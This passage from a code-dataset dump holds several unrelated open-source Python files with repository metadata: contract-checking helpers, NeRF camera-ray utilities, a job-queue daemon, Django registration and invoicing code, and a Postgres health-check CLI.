1. a "returns" predicate. This is a postcondition that tests the return value.
2. an "args" predicate. This tests the parameters with additional predicates.
3. a "const" predicate. This asserts that self is not mutated (old==self).
Since some of those take additional predicates, some abstractions might be nice:
1. nullable: allows null (or an additional test, passed in, such as nullable(positive)
2. numeric tests: (number, positive, negative)
3. logical tests: (not, and, or) with negative==not(positive), nonzero==or(positive, negative)
4. is_type: some kind of isinstance wrapper
"""
from functools import wraps
def returns(predicate):
"""DBC helper for reusable, simple predicates for return-value tests used in postconditions"""
@wraps(predicate)
def return_wrapped(s, old, ret, *args, **kwargs):
return predicate(ret)
return return_wrapped
def state(predicate):
"""DBC helper for reusable, simple predicates for object-state tests used in both preconditions and postconditions"""
@wraps(predicate)
def wrapped_predicate(s, *args, **kwargs):
return predicate(s)
return wrapped_predicate
def args(*arglist):
"""DBC helper for reusable, simple predicates for argument-value tests used in preconditions"""
def positional_predicate(s, *ar, **kw):
for pred, arg in zip(arglist, ar):
if not pred(arg):
return False
return True
return positional_predicate
def not_(predicate):
"""DBC helper for negating reusable, simple predicates used in preconditions, postconditions, and invariants"""
@wraps(predicate)
def negated_predicate(*args, **kwargs):
return not predicate(*args, **kwargs)
return negated_predicate
def or_(predicate1, predicate2):
"""DBC helper for disjunction of predicates"""
def or_predicates(*args, **kwargs):
return predicate1(*args, **kwargs) or predicate2(*args, **kwargs)
return or_predicates
def and_(predicate1, predicate2):
"""DBC helper for conjunction of predicates"""
def and_predicates(*args, **kwargs):
return predicate1(*args, **kwargs) and predicate2(*args, **kwargs)
return and_predicates
class argument_types:
"""DBC helper for reusable, simple predicates for argument-type tests used in preconditions"""
def __init__(self, *typelist):
self.typelist = typelist
self.msg = "implementation error in argument_types"
def _str_to_class(self, string):
import sys
return reduce(getattr, string.split("."), sys.modules[__name__])
def __call__(self, s, *args, **kwargs):
for typ, arg in zip(self.typelist, args):
if isinstance(typ, str):
if isinstance(arg, self._str_to_class(typ)) and arg is not None:
self.msg = "argument %s was not of type %s" % (arg, typ)
return False
if not isinstance(arg, typ) and arg is not None:
self.msg = "argument %s was not of type %s" % (arg, typ.__name__)
return False
return True
def error(self):
return self.msg
def const(self, old, ret, *args, **kwargs):
"""Object constness was violated by the method call (did you forget to override __eq__?)"""
return old.self == self
| {
"content_hash": "c02a32198fbb36a38c1802b3775d4c7e",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 121,
"avg_line_length": 40.71764705882353,
"alnum_prop": 0.6668592892227679,
"repo_name": "ccoakley/dbcbet",
"id": "d5074701792edcce4011994b29541d7b80d1bb26",
"size": "3461",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dbcbet/helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "56718"
}
],
"symlink_target": ""
} |
"""Functions for helping running NeRF-based networks."""
import math
import tensorflow as tf
from tensorflow_graphics.geometry.transformation import rotation_matrix_3d
from tensorflow_graphics.util import shape
pi = math.pi
def match_intermediate_batch_dimensions(tensor1, tensor2):
"""Match the batch dimensions.
Args:
tensor1: A tensor of shape `[A1, M]`.
tensor2: A tensor of shape `[A1, ..., An, N]`.
Returns:
A tensor of shape `[A1, ..., An, M]`.
"""
shape.check_static(
tensor=tensor1,
tensor_name="tensor1",
has_rank=2)
shape.check_static(
tensor=tensor2,
tensor_name="tensor2",
has_rank_greater_than=1)
shape.compare_dimensions(tensors=(tensor1, tensor2),
tensor_names=("tensor1", "tensor2"),
axes=0)
shape1 = tf.shape(tensor1)
shape2 = tf.shape(tensor2)
shape_diff = len(shape2) - len(shape1)
new_shape = tf.concat([[shape1[0]], [1]*shape_diff, [shape1[-1]]], axis=-1)
target_shape = tf.concat([shape2[:-1], [shape1[-1]]], axis=-1)
return tf.broadcast_to(tf.reshape(tensor1, new_shape), target_shape)
def change_coordinate_system(points3d,
rotations=(0., 0., 0.),
scale=(1., 1., 1.),
name="change_coordinate_system"):
"""Change coordinate system.
Args:
points3d: A tensor of shape `[A1, ..., An, M, 3]` containing the
3D position of M points.
rotations: A tuple containing the X, Y, Z axis rotation.
scale: A tuple containing the X, Y, Z axis scale.
name: A name for this op. Defaults to "change_coordinate_system".
Returns:
[type]: [description]
"""
with tf.name_scope(name):
points3d = tf.convert_to_tensor(points3d)
rotation = tf.convert_to_tensor(rotations)
scale = tf.convert_to_tensor(scale)
rotation_matrix = rotation_matrix_3d.from_euler(rotation)
scaling_matrix = scale*tf.eye(3, 3)
target_shape = [1]*(len(points3d.get_shape().as_list())- 2) + [3, 3]
transformation = tf.matmul(scaling_matrix, rotation_matrix)
transformation = tf.reshape(transformation, target_shape)
return tf.linalg.matrix_transpose(
tf.matmul(transformation, tf.linalg.matrix_transpose(points3d)))
@tf.function
def get_distances_between_points(ray_points3d, last_bin_width=1e10):
"""Estimates the distance between points in a ray.
Args:
ray_points3d: A tensor of shape `[A1, ..., An, M, 3]`,
where M is the number of points in a ray.
last_bin_width: A scalar indicating the witdth of the last bin.
Returns:
A tensor of shape `[A1, ..., An, M]` containing the distances between
the M points, with the distance of the last element set to a high value.
"""
shape.check_static(
tensor=ray_points3d,
tensor_name="ray_points3d",
has_dim_equals=(-1, 3))
shape.check_static(
tensor=ray_points3d,
tensor_name="ray_points3d",
has_rank_greater_than=1)
dists = tf.norm(ray_points3d[..., 1:, :] - ray_points3d[..., :-1, :], axis=-1)
if last_bin_width > 0.0:
dists = tf.concat([dists, tf.broadcast_to([last_bin_width],
dists[..., :1].shape)], axis=-1)
return dists
@tf.function
def _move_in_front_of_camera(points3d,
rotation_matrix,
translation_vector):
"""Moves a set of points in front of a camera given by its extrinsics.
Args:
points3d: A tensor of shape `[A1, ..., An, M, 3]`,
where M is the number of points.
rotation_matrix: A tensor of shape `[A1, ..., An, 3, 3]`.
translation_vector: A tensor of shape `[A1, ..., An, 3, 1]`.
Returns:
A tensor of shape `[A1, ..., An, M, 3]`.
"""
points3d = tf.convert_to_tensor(value=points3d)
rotation_matrix = tf.convert_to_tensor(value=rotation_matrix)
translation_vector = tf.convert_to_tensor(value=translation_vector)
shape.check_static(
tensor=points3d, tensor_name="points3d", has_dim_equals=(-1, 3))
shape.check_static(
tensor=rotation_matrix,
tensor_name="rotation_matrix",
has_dim_equals=(-1, 3))
shape.check_static(
tensor=rotation_matrix,
tensor_name="rotation_matrix",
has_dim_equals=(-2, 3))
shape.check_static(
tensor=translation_vector,
tensor_name="translation_vector",
has_dim_equals=(-1, 1))
shape.check_static(
tensor=translation_vector,
tensor_name="translation_vector",
has_dim_equals=(-2, 3))
shape.compare_batch_dimensions(
tensors=(points3d, rotation_matrix, translation_vector),
tensor_names=("points3d", "rotation_matrix", "translation_vector"),
last_axes=-3,
broadcast_compatible=True)
points3d_corrected = tf.linalg.matrix_transpose(points3d) + translation_vector
rotation_matrix_t = -tf.linalg.matrix_transpose(rotation_matrix)
points3d_world = tf.matmul(rotation_matrix_t, points3d_corrected)
return tf.linalg.matrix_transpose(points3d_world)
@tf.function
def camera_rays_from_extrinsics(rays,
rotation_matrix,
translation_vector):
"""Transform the rays from a camera located at (0, 0, 0) to ray origins and directions for a camera with given extrinsics.
Args:
rays: A tensor of shape `[A1, ..., An, N, 3]` where N is the number of rays.
rotation_matrix: A tensor of shape `[A1, ..., An, 3, 3]`.
translation_vector: A tensor of shape `[A1, ..., An, 3, 1]`.
Returns:
A tensor of shape `[A1, ..., An, N, 3]` representing the ray origin and
a tensor of shape `[A1, ..., An, N, 3]` representing the ray direction.
"""
shape.check_static(tensor=rays,
tensor_name="pixels",
has_rank_greater_than=1)
shape.compare_batch_dimensions(
tensors=(rays, rotation_matrix, translation_vector),
tensor_names=("points_on_rays", "rotation_matrix", "translation_vector"),
last_axes=-3,
broadcast_compatible=False)
rays_org = _move_in_front_of_camera(tf.zeros_like(rays),
rotation_matrix,
translation_vector)
rays_dir_ = _move_in_front_of_camera(rays,
rotation_matrix,
0 * translation_vector)
rays_dir = rays_dir_/tf.norm(rays_dir_, axis=-1, keepdims=True)
return rays_org, rays_dir
def camera_rays_from_transformation_matrix(rays, transform_matrix):
"""Estimate ray origin and direction from transformation matrix.
Args:
rays: A tensor of shape `[A1, ..., An, N, 3]` where N is the number of rays.
transform_matrix: A tensor of shape `[A1, ..., An, 4, 4]`.
Returns:
A tensor of shape `[A1, ..., An, N, 3]` representing the ray origin and
a tensor of shape `[A1, ..., An, N, 3]` representing the ray direction.
"""
rays_o = transform_matrix[..., :3, -1] # [A1, ..., An, 3]
rays_o = tf.expand_dims(rays_o, -2) # [A1, ..., An, 1, 3]
rays_o = tf.broadcast_to(rays_o, tf.shape(rays)) # [A1, ..., An, N, 3]
rot = transform_matrix[..., tf.newaxis, :3, :3]
rays_d = tf.reduce_sum(tf.expand_dims(rays, axis=-2) * rot, axis=-1)
return rays_o, rays_d
def l2_loss(prediction, target, weights=1.0):
"""L2 loss implementation that forces same prediction and target shapes."""
assert prediction.shape == target.shape, "Shape dims should be the same."
return tf.reduce_mean(weights * tf.square(target - prediction))
def l2_loss_distrib(prediction, target, global_batch_size, weights=1.0):
"""L2 loss implementation that forces same prediction and target shapes."""
assert prediction.shape == target.shape, "Shape dims should be the same."
return tf.reduce_sum(
weights*tf.square(target-prediction))*(1./global_batch_size)
| {
"content_hash": "4b79828311b7b917ffcbbe858d5ebda4",
"timestamp": "",
"source": "github",
"line_count": 207,
"max_line_length": 124,
"avg_line_length": 38.16425120772947,
"alnum_prop": 0.6237974683544304,
"repo_name": "tensorflow/graphics",
"id": "1246b28f057def07c324acbcee538d4973affde9",
"size": "8486",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow_graphics/projects/radiance_fields/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "2403"
},
{
"name": "C++",
"bytes": "115377"
},
{
"name": "Cython",
"bytes": "12955"
},
{
"name": "JavaScript",
"bytes": "22252"
},
{
"name": "Jupyter Notebook",
"bytes": "246839"
},
{
"name": "Python",
"bytes": "2222139"
},
{
"name": "Shell",
"bytes": "4281"
},
{
"name": "Starlark",
"bytes": "2233"
}
],
"symlink_target": ""
} |
"""pidaemon.py
Usage:
pidaemon.py [--brightness=<b>] [--sleep=<s>] [--interval=<s>] [--wait=<s>]
pidaemon.py (-h | --help)
pidaemon.py --version
Options:
-h --help Show this screen.
--version Show version
--brightness=<b> Default brightness level 1-255 [default: 2]
--interval=<s> Default interval in seconds between each frame in jobs [default: 0.1]
--sleep=<s> Default number of seconds to pause after each job [default: 0]
--wait=<s> Time between each iteration when polling for job on an empty queue. [default: 5]
"""
import sys
import signal
import time
from docopt import docopt
from collections import defaultdict
import settings
from piqueue import piqueue
class PiDaemon():
def __init__(self, opts):
self.running = None
self.options = self.parse_options(opts)
self.session = piqueue.Session()
self.setup_signal_handlers()
def parse_options(self, opts):
options = defaultdict(lambda: None, {
'brightness': int(opts['--brightness']),
'sleep': float(opts['--sleep']),
'interval': float(opts['--interval']),
'wait': float(opts['--wait']),
})
return options
def run(self):
while True:
job = self.next_job()
if job is not None:
self.run_job(job)
if job.options['keep'] == True:
self.add_job(job)
self.delete_job(job)
else:
time.sleep(self.options['wait'])
def run_job(self, job):
self.running = job.job_instance(self.options.copy())
self.running.run()
self.running.sleep()
self.running.cleanup()
self.running = None
def queue(self):
return self.session.query(piqueue.Job).order_by(piqueue.Job.date_created)
def next_job(self):
return self.queue().first()
def add_job(self, old_job):
new_job = piqueue.Job(old_job.job_name, old_job.options)
self.session.add(new_job)
self.session.commit()
def delete_job(self, job):
self.session.delete(job)
self.session.commit()
def setup_signal_handlers(self):
signal.signal(signal.SIGINT, self.cleanup)
signal.signal(signal.SIGTERM, self.cleanup)
def cleanup(self, signum, frame):
if self.running is not None:
self.running.cleanup()
sys.exit(-1)
if __name__ == '__main__':
opts = docopt(__doc__, version='PiDaemon v1.0')
PiDaemon(opts).run()
| {
"content_hash": "6634f30c6b1f4dfeab1507f4011a7e00",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 100,
"avg_line_length": 29.181818181818183,
"alnum_prop": 0.5852803738317757,
"repo_name": "ollej/piapi",
"id": "9a713ff09ee505899d214450c2a3c4d64e7f9702",
"size": "2568",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pidaemon.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "27673"
},
{
"name": "Shell",
"bytes": "296"
}
],
"symlink_target": ""
} |
from app import db
class clients(db.Model):
idclients = db.Column(db.Integer, primary_key=True)
fname = db.Column(db.String(45), index=True)
lname = db.Column(db.String(45), index=True)
phone = db.Column(db.String(10))
dob = db.Column(db.Date, index=True)
def __repr__(self):
return '<clients %r>' % (self.lname)
class ifa(db.Model):
idifa = db.Column(db.Integer, primary_key=True)
description = db.Column(db.String(450))
duedate = db.Column(db.Date)
clients_idclients = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<User %r>' % (self.nickname)
class deleted_ifa(db.Model):
id = db.Column(db.Integer, primary_key=True)
description = db.Column(db.String(450))
duedate = db.Column(db.Date)
clients_idclients = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<User %r>' % (self.nickname)
| {
"content_hash": "817c94c2e3627fd52bfaf17ba6f18c0d",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 68,
"avg_line_length": 29.322580645161292,
"alnum_prop": 0.658965896589659,
"repo_name": "nickster5001/ctracker",
"id": "cab1f190be9de9a1f66d714bd5eb8cf5429708dd",
"size": "909",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "6349"
},
{
"name": "CSS",
"bytes": "11536"
},
{
"name": "HTML",
"bytes": "25137"
},
{
"name": "JavaScript",
"bytes": "22141"
},
{
"name": "Python",
"bytes": "10917902"
},
{
"name": "Shell",
"bytes": "3666"
}
],
"symlink_target": ""
} |
import datetime
from typing import List
from django.db import transaction
from quickbooks.exceptions import QuickbooksException
from rest_framework import generics, response, status
from rest_framework.authentication import SessionAuthentication
from rest_framework.exceptions import PermissionDenied
from huxley.api.serializers import CreateUserSerializer, RegistrationSerializer
from huxley.core.constants import PaymentTypes
from huxley.core.models import Conference
from huxley.invoice_automation.src import handler
from huxley.invoice_automation.src.model.address import Address
from huxley.invoice_automation.src.model.conference import Conference as invoiceConference
from huxley.invoice_automation.src.model.payment_method import PaymentMethod
from huxley.invoice_automation.src.model.school import School as invoiceSchool
from huxley.invoice_automation.src.model.registration import Registration as invoiceRegistration
from huxley.logging.models import LogEntry
class Register(generics.GenericAPIView):
authentication_classes = (SessionAuthentication, )
serializer_classes = {
'user': CreateUserSerializer,
'registration': RegistrationSerializer
}
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
def create(self, request, *args, **kwargs):
if Conference.get_current().open_reg:
return self.register(request, *args, **kwargs)
raise PermissionDenied('Conference registration is closed.')
def register(self, request, *args, **kwargs):
user_data = request.data['user']
registration_data = request.data['registration']
with transaction.atomic():
user_serializer = self.serializer_classes['user'](data=user_data)
user_is_valid = user_serializer.is_valid()
if not user_is_valid:
registration_serializer = self.serializer_classes[
'registration'](data=registration_data)
registration_serializer.is_valid()
errors = registration_serializer.errors
errors.update(user_serializer.errors)
return response.Response(
errors, status=status.HTTP_400_BAD_REQUEST)
user_serializer.save()
school_id = user_serializer.data['school']['id']
registration_data['school'] = school_id
registration_serializer = self.serializer_classes['registration'](
data=registration_data)
registration_serializer.is_valid(raise_exception=True)
registration_serializer.save()
if Conference.get_current().invoicing_enabled and handler is not None:
school_data = user_data['school']
address = Address(
line1=school_data['address'],
line2='',
city=school_data['city'],
country_sub_division_code=school_data['state'],
country=school_data['country'],
zip_code=school_data['zip_code']
)
num_delegates = sum(
map(
int,
[
registration_data['num_beginner_delegates'],
registration_data['num_intermediate_delegates'],
registration_data['num_advanced_delegates']
]
)
)
if int(registration_data['payment_type']) == PaymentTypes.CARD:
payment_method = PaymentMethod.Card
else:
payment_method = PaymentMethod.Check
invoices_sent = call_invoice_handler(
school_name=school_data['name'],
email=school_data['primary_email'],
phone_numbers=[school_data['primary_phone'], school_data['secondary_phone']],
address=address,
num_delegates=num_delegates,
payment_method=payment_method
)
if invoices_sent:
reg_object = registration_serializer.instance
reg_object.invoices_sent = True
reg_object.save()
data = {'user': user_serializer.data,
'registration': registration_serializer.data}
return response.Response(data, status=status.HTTP_200_OK)
def call_invoice_handler(school_name: str,
email: str,
phone_numbers: List[str],
address: Address,
num_delegates: int,
payment_method: PaymentMethod) -> bool:
"""
:param school_name:
:param email:
:param phone_numbers:
:param address:
:param num_delegates:
:param payment_method:
:return bool: whether the invoices were successfully sent and created or not
"""
school = invoiceSchool(school_name, email, phone_numbers, address)
registration = invoiceRegistration(
school=school,
num_delegates=num_delegates,
conference=invoiceConference.BMUN,
registration_date=datetime.date.today(),
payment_method=payment_method
)
try:
handler.handle_registration(registration)
return True
except QuickbooksException as e:
log_entry = LogEntry(
level="ERROR",
message=e.message,
timestamp=datetime.datetime.now(),
uri="/api/register",
status_code=500,
username=""
)
log_entry.save()
return False
| {
"content_hash": "c3404b93184f3daf4e98589a16ad81a5",
"timestamp": "",
"source": "github",
"line_count": 145,
"max_line_length": 96,
"avg_line_length": 38.675862068965515,
"alnum_prop": 0.6135877318116976,
"repo_name": "bmun/huxley",
"id": "cfde1adbf5001c596019d8fa8a4c537cb0472c71",
"size": "5756",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "huxley/api/views/register.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "13301"
},
{
"name": "JavaScript",
"bytes": "400597"
},
{
"name": "Less",
"bytes": "19215"
},
{
"name": "Python",
"bytes": "635783"
},
{
"name": "Shell",
"bytes": "2475"
}
],
"symlink_target": ""
} |
import EMUtils
import SrcUtils | {
"content_hash": "fd18112f11292c843d88711b911d7096",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 15,
"avg_line_length": 15,
"alnum_prop": 0.9,
"repo_name": "simpeg/simpegem",
"id": "6e430cf90793bea8aebc3152c92d93bd3b71c609",
"size": "76",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "simpegEM/Utils/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "562675"
},
{
"name": "Python",
"bytes": "163227"
}
],
"symlink_target": ""
} |
import psycopg2
import click
import getpass
from tabulate import tabulate
def print_results(cursor):
headers = map(lambda column: column.name, cursor.description)
def truncate_row(row):
return map(truncate_column, row)
def truncate_column(column):
column = str(column)
return (column[:90] + '..') if len(column) > 75 else column
click.echo(tabulate(map(truncate_row, cursor), headers=headers, tablefmt="psql"))
def pg_stat_statement_available(cursor):
sql = """
SELECT exists(
SELECT 1 FROM pg_extension e LEFT JOIN pg_namespace n ON n.oid = e.extnamespace
WHERE e.extname='pg_stat_statements' AND n.nspname = 'public'
) AS available
"""
cursor.execute(sql)
return cursor.fetchone()[0]
def database_command(fn):
@click.command(fn.__name__)
@click.pass_context
def wrapper(ctx):
connection = psycopg2.connect(ctx.obj)
cursor = connection.cursor()
results = fn(cursor)
if results:
print_results(results)
cursor.close()
connection.close()
return wrapper
@database_command
def index_sizes(cursor):
sql = """
SELECT c.relname AS name,
pg_size_pretty(sum(c.relpages::bigint*8192)::bigint) AS size
FROM pg_class c
LEFT JOIN pg_namespace n ON (n.oid = c.relnamespace)
WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
AND n.nspname !~ '^pg_toast'
AND c.relkind = 'i'
GROUP BY c.relname
ORDER BY sum(c.relpages) DESC;
"""
cursor.execute(sql)
return cursor
@database_command
def bloat(cursor):
sql = """
WITH constants AS (
SELECT current_setting('block_size')::numeric AS bs, 23 AS hdr, 4 AS ma
), bloat_info AS (
SELECT ma,bs,schemaname,tablename,
(datawidth+(hdr+ma-(case when hdr%ma=0 THEN ma ELSE hdr%ma END)))::numeric AS datahdr,
(maxfracsum*(nullhdr+ma-(case when nullhdr%ma=0 THEN ma ELSE nullhdr%ma END))) AS nullhdr2
FROM (
SELECT schemaname, tablename, hdr, ma, bs,
SUM((1-null_frac)*avg_width) AS datawidth,
MAX(null_frac) AS maxfracsum,
hdr+(
SELECT 1+count(*)/8 FROM pg_stats s2
WHERE null_frac<>0 AND s2.schemaname = s.schemaname AND s2.tablename = s.tablename
) AS nullhdr
FROM pg_stats s, constants
GROUP BY 1,2,3,4,5
) AS foo
), table_bloat AS (
SELECT schemaname, tablename, cc.relpages, bs,
CEIL((cc.reltuples*((datahdr+ma-
(CASE WHEN datahdr%ma=0 THEN ma ELSE datahdr%ma END))+nullhdr2+4))/(bs-20::float)) AS otta
FROM bloat_info
JOIN pg_class cc ON cc.relname = bloat_info.tablename
JOIN pg_namespace nn ON cc.relnamespace = nn.oid AND nn.nspname = bloat_info.schemaname AND nn.nspname <> 'information_schema'
), index_bloat AS (
SELECT schemaname, tablename, bs,
COALESCE(c2.relname,'?') AS iname, COALESCE(c2.reltuples,0) AS ituples, COALESCE(c2.relpages,0) AS ipages,
COALESCE(CEIL((c2.reltuples*(datahdr-12))/(bs-20::float)),0) AS iotta -- very rough approximation, assumes all cols
FROM bloat_info
JOIN pg_class cc ON cc.relname = bloat_info.tablename
JOIN pg_namespace nn ON cc.relnamespace = nn.oid AND nn.nspname = bloat_info.schemaname AND nn.nspname <> 'information_schema'
JOIN pg_index i ON indrelid = cc.oid
JOIN pg_class c2 ON c2.oid = i.indexrelid
) SELECT
type, schemaname, object_name, bloat, pg_size_pretty(raw_waste) as waste
FROM
(
SELECT 'table' as type, schemaname, tablename as object_name,
ROUND(CASE WHEN otta=0 THEN 0.0 ELSE table_bloat.relpages/otta::numeric END,1) AS bloat,
CASE WHEN relpages < otta THEN '0' ELSE (bs*(table_bloat.relpages-otta)::bigint)::bigint END AS raw_waste
FROM table_bloat
UNION SELECT 'index' as type, schemaname, tablename || '::' || iname as object_name,
ROUND(CASE WHEN iotta=0 OR ipages=0 THEN 0.0 ELSE ipages/iotta::numeric END,1) AS bloat,
CASE WHEN ipages < iotta THEN '0' ELSE (bs*(ipages-iotta))::bigint END AS raw_waste
FROM index_bloat
) bloat_summary
ORDER BY raw_waste DESC, bloat DESC
"""
cursor.execute(sql)
return cursor
@database_command
def blocking(cursor):
sql = """
SELECT bl.pid AS blocked_pid,
ka.query AS blocking_statement,
now() - ka.query_start AS blocking_duration,
kl.pid AS blocking_pid,
a.query AS blocked_statement,
now() - a.query_start AS blocked_duration
FROM pg_catalog.pg_locks bl
JOIN pg_catalog.pg_stat_activity a ON bl.pid = a.pid
JOIN pg_catalog.pg_locks kl
JOIN pg_catalog.pg_stat_activity ka ON kl.pid = ka.pid
ON bl.transactionid = kl.transactionid AND bl.pid != kl.pid
WHERE NOT bl.granted
"""
cursor.execute(sql)
return cursor
@database_command
def cache_hit(cursor):
sql = """
SELECT 'index hit rate' AS name,
(sum(idx_blks_hit)) / nullif(sum(idx_blks_hit + idx_blks_read),0) AS ratio
FROM pg_statio_user_indexes
UNION ALL
SELECT 'table hit rate' AS name,
sum(heap_blks_hit) / nullif(sum(heap_blks_hit) + sum(heap_blks_read),0) AS ratio
FROM pg_statio_user_tables
"""
cursor.execute(sql)
return cursor
@database_command
def calls(cursor):
if pg_stat_statement_available(cursor):
sql = """
SELECT query AS qry,
interval '1 millisecond' * total_time AS exec_time,
to_char((total_time/sum(total_time) OVER()) * 100, 'FM90D0') || '%' AS prop_exec_time,
to_char(calls, 'FM999G999G990') AS ncalls,
interval '1 millisecond' * (blk_read_time + blk_write_time) AS sync_io_time
FROM pg_stat_statements WHERE userid = (SELECT usesysid FROM pg_user WHERE usename = current_user LIMIT 1)
ORDER BY calls DESC LIMIT 10
"""
cursor.execute(sql)
return cursor
else:
click.echo("pg_stat_statements extension need to be installed in the public schema first.")
click.echo("This extension is only available on Postgres versions 9.2 or greater. You can install it by running:")
click.echo("\n\tCREATE EXTENSION pg_stat_statements;\n\n")
@database_command
def index_usage(cursor):
sql = """
SELECT relname,
CASE idx_scan
WHEN 0 THEN 'Insufficient data'
ELSE (100 * idx_scan / (seq_scan + idx_scan))::text
END percent_of_times_index_used
FROM pg_stat_user_tables
ORDER BY percent_of_times_index_used ASC
"""
cursor.execute(sql)
return cursor
@database_command
def locks(cursor):
sql = """
SELECT pg_stat_activity.pid, pg_class.relname, pg_locks.transactionid,
pg_locks.granted, pg_stat_activity.query AS query_snippet,
age(now(),pg_stat_activity.query_start) AS "age"
FROM pg_stat_activity,pg_locks
LEFT OUTER JOIN pg_class ON (pg_locks.relation = pg_class.oid)
WHERE pg_stat_activity.query <> '<insufficient privilege>'
AND pg_locks.pid = pg_stat_activity.pid
AND pg_locks.mode = 'ExclusiveLock'
AND pg_stat_activity.pid <> pg_backend_pid() order by query_start
"""
cursor.execute(sql)
return cursor
@database_command
def long_running_queries(cursor):
sql = """
SELECT
pid, now() - pg_stat_activity.query_start AS duration, query
FROM
pg_stat_activity
WHERE pg_stat_activity.query <> ''::text
AND state <> 'idle'
AND now() - pg_stat_activity.query_start > interval '5 minutes'
ORDER BY now() - pg_stat_activity.query_start DESC
"""
cursor.execute(sql)
return cursor
@database_command
def outliers(cursor):
if pg_stat_statement_available(cursor):
sql = """
SELECT interval '1 millisecond' * total_time AS total_exec_time,
to_char((total_time/sum(total_time) OVER()) * 100, 'FM90D0') || '%' AS prop_exec_time,
to_char(calls, 'FM999G999G999G990') AS ncalls,
interval '1 millisecond' * (blk_read_time + blk_write_time) AS sync_io_time, query
FROM pg_stat_statements
WHERE userid = (SELECT usesysid FROM pg_user WHERE usename = current_user LIMIT 1)
ORDER BY total_time DESC LIMIT 10
"""
cursor.execute(sql)
return cursor
else:
click.echo("pg_stat_statements extension need to be installed in the public schema first.")
click.echo("This extension is only available on Postgres versions 9.2 or greater. You can install it by running:")
click.echo("\n\tCREATE EXTENSION pg_stat_statements;\n\n")
@database_command
def ps(cursor):
sql = """
SELECT pid, state, application_name AS source,
age(now(),xact_start) AS running_for, waiting, query
FROM pg_stat_activity
WHERE query <> '<insufficient privilege>' AND state <> 'idle'
AND pid <> pg_backend_pid()
ORDER BY query_start DESC
"""
cursor.execute(sql)
return cursor
@database_command
def records_rank(cursor):
sql = """
SELECT relname AS name, n_live_tup AS estimated_count
FROM pg_stat_user_tables
ORDER BY n_live_tup DESC
"""
cursor.execute(sql)
return cursor
@database_command
def seq_scans(cursor):
sql = """
SELECT relname AS name, seq_scan as count
FROM pg_stat_user_tables
ORDER BY seq_scan DESC
"""
cursor.execute(sql)
return cursor
@database_command
def table_size(cursor):
sql = """
SELECT c.relname AS name,
pg_size_pretty(pg_table_size(c.oid)) AS size
FROM pg_class c
LEFT JOIN pg_namespace n ON (n.oid = c.relnamespace)
WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
AND n.nspname !~ '^pg_toast'
AND c.relkind='r'
ORDER BY pg_table_size(c.oid) DESC
"""
cursor.execute(sql)
return cursor
@database_command
def total_table_size(cursor):
sql = """
SELECT c.relname AS name,
pg_size_pretty(pg_total_relation_size(c.oid)) AS size
FROM pg_class c
LEFT JOIN pg_namespace n ON (n.oid = c.relnamespace)
WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
AND n.nspname !~ '^pg_toast'
AND c.relkind='r'
ORDER BY pg_total_relation_size(c.oid) DESC
"""
cursor.execute(sql)
return cursor
@database_command
def unused_indexes(cursor):
sql = """
SELECT schemaname || '.' || relname AS table, indexrelname AS index,
pg_size_pretty(pg_relation_size(i.indexrelid)) AS index_size,
idx_scan as index_scans
FROM pg_stat_user_indexes ui
JOIN pg_index i ON ui.indexrelid = i.indexrelid
WHERE NOT indisunique AND idx_scan < 50 AND pg_relation_size(relid) > 5 * 8192
ORDER BY
pg_relation_size(i.indexrelid) / nullif(idx_scan, 0) DESC NULLS FIRST,
pg_relation_size(i.indexrelid) DESC
"""
cursor.execute(sql)
return cursor
@click.group()
@click.pass_context
@click.argument('database_url')
def cli(ctx, database_url):
ctx.obj = database_url
cli.add_command(index_sizes)
cli.add_command(bloat)
cli.add_command(blocking)
cli.add_command(cache_hit)
cli.add_command(calls)
cli.add_command(index_usage)
cli.add_command(locks)
cli.add_command(long_running_queries)
cli.add_command(outliers)
cli.add_command(ps)
cli.add_command(records_rank)
cli.add_command(seq_scans)
cli.add_command(table_size)
cli.add_command(total_table_size)
cli.add_command(unused_indexes)
| {
"content_hash": "12a7b04df3fe6160e3d2ad2de643ae0d",
"timestamp": "",
"source": "github",
"line_count": 359,
"max_line_length": 132,
"avg_line_length": 31.30640668523677,
"alnum_prop": 0.6630483139069312,
"repo_name": "nata79/pgh",
"id": "15be1fb5f6ec36d44974335b72631119e0438de8",
"size": "11239",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pgh.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "11836"
}
],
"symlink_target": ""
} |
import logging
from dart.model.action import ActionType
_logger = logging.getLogger(__name__)
class RedshiftActionTypes(object):
start_datastore = ActionType(
name='start_datastore',
description='create or restore this Redshift cluster',
params_json_schema={
'type': 'object',
'properties': {
'snapshot_name': {
'type': ['string', 'null'],
'default': None,
'description': 'the cluster will be restored from this snapshot, or else the latest if one exists'
' (otherwise, a new cluster will be created)'
},
},
'additionalProperties': False,
},
)
stop_datastore = ActionType(
name='stop_datastore',
description='Stops this Redshift cluster and creates a final snapshot',
)
create_snapshot = ActionType(
name='create_snapshot',
description='create a snapshot of this cluster in the form "dart-datastore-<id>-<YYYYmmddHHMMSS>"',
)
execute_sql = ActionType(
name='execute_sql',
